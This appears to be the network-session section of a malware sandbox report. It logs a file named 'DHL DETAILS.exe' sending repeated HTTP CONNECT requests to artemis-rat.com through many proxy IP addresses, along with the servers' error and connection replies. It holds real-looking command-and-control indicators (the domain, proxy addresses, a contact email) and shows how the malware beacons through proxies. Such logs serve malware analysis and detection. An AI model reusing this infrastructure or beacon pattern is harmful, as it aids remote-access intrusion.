Mar 9, 2024 13:14:14.301857948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.833643913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.333451033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833762884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49792	104.22.50.220	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.935657024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.090004921 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49710	154.73.29.1	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.937556982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.614315987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.567480087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.631135941 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49784	91.134.140.160	57320	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.967963934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49722	119.3.215.41	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.982184887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49779	184.170.248.5	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.999576092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49783	184.170.245.148	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.004264116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49825	154.208.10.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.007875919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.172245026 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.1 Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49750	61.129.2.212	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.018908024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.724714994 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49793	24.249.199.12	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.040191889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49855	172.67.38.96	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.059258938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.213886976 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49851	142.54.239.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.066010952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49804	43.131.248.165	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.132630110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49862	165.227.104.122	58839	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.137772083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.692455053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.411207914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.833111048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.677006960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.601267099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.567655087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.248676062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49824	31.207.38.66	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.146119118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.825834990 CET	408	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 09 Mar 2024 12:14:12 GMT Server: Apache Allow: OPTIONS,HEAD,GET,POST Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49820	43.155.130.182	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.160240889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49822	120.76.42.209	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.179724932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49827	91.134.140.160	32896	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.217437029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.958089113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49898	172.67.181.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.221848965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.376121998 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49847	185.104.112.62	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.229953051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.573270082 CET	799	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:12 GMT Server: Apache/2.4.56 (Debian) Content-Length: 607 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49868	155.185.15.56	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.232645988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.614360094 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49874	198.12.255.193	6821	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.235133886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.754981041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.380042076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.614347935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.224272966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724297047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.223916054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.161186934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146536112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49838	103.49.202.250	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.242485046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.158482075 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
